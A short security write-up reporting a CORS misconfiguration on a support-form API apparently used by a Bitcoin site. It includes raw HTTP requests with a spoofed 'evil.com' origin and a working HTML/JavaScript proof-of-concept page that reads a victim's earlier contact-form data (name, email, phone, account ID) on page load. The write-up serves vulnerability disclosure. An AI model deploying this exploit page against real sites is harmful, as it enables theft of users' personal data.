Exploiting Misconfigured CORS on popular BTC Site

Severity: Medium

Complexity : Easy

Weakness : Allowing ACAH


On one of the popular BTC site , I was facing some issue with account so i used the’r support form to inform them .

Thing’s i Provided By form :

  1. Email .
  2. Phone Number.
  3. Name.
  4. Message.

Clicked on Submit and Noticed that Form is being sent to third party site .

https://api.thirdparty.com/api/contact/widget/281d02/ in form of POST Data .

POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cookie: REDACTED
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

{“firstName”:”adsgasgsag”,”lastName”:null,”company”:null,”email”:”asgasgasgn1241@gmail.com”,”phone”:”9876543210",”accountId”:”38517",”message”:”xxx”,”Tags”:[]}


  • After Sending form i changed the request Method to GET ,
  • Added Origin: evil.com in Request Header

GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com

  • Response :

Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true

{"contactUid":"025381","firstName":"adsgasgsag","lastName":null,"company":null,"email":"asgasgasgn1241@gmail.com","phone":"9123091647","additionalDetails":{},"accountId":38517,”location”:null,”Tags”:[]}

  • Surprised to see Access-Control-Allow-Credentials: true

<html>
<body onload=’load()’>
<p id=”demo”></p>
Name: <h3 id=”name”></h3>
Email : <h3 id=”email”></h3>
Phone : <h3 id=”phone”></h3>
ACCID :<h3 id=”AccountID”></h3>
<h3 id=”que”></h3>
<script>
function load(){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
//document.getElementById(‘demo’).innerHTML = JSON.stringify(this.responseText);
parsed = JSON.parse(this.responseText);
var arr = [];
for(var x in parsed){
arr.push(parsed[x]);
}
console.log(arr)
document.getElementById(‘email’).innerHTML = arr[6];
document.getElementById(‘name’).innerHTML = arr[3];
document.getElementById(‘phone’).innerHTML = arr[7];
document.getElementById(‘AccountID’).innerHTML = arr[9];
}
};
xhr.open(“GET”,”https://api.thirdparty.com/api/contact/widget/281d02",true);
xhr.send();
}
</script>
</body>
</html>
poc
  • As Soon as victim(user who used the’r support form at anytime or any previous date) visit’s malicious page . His previous form data get’s extracted .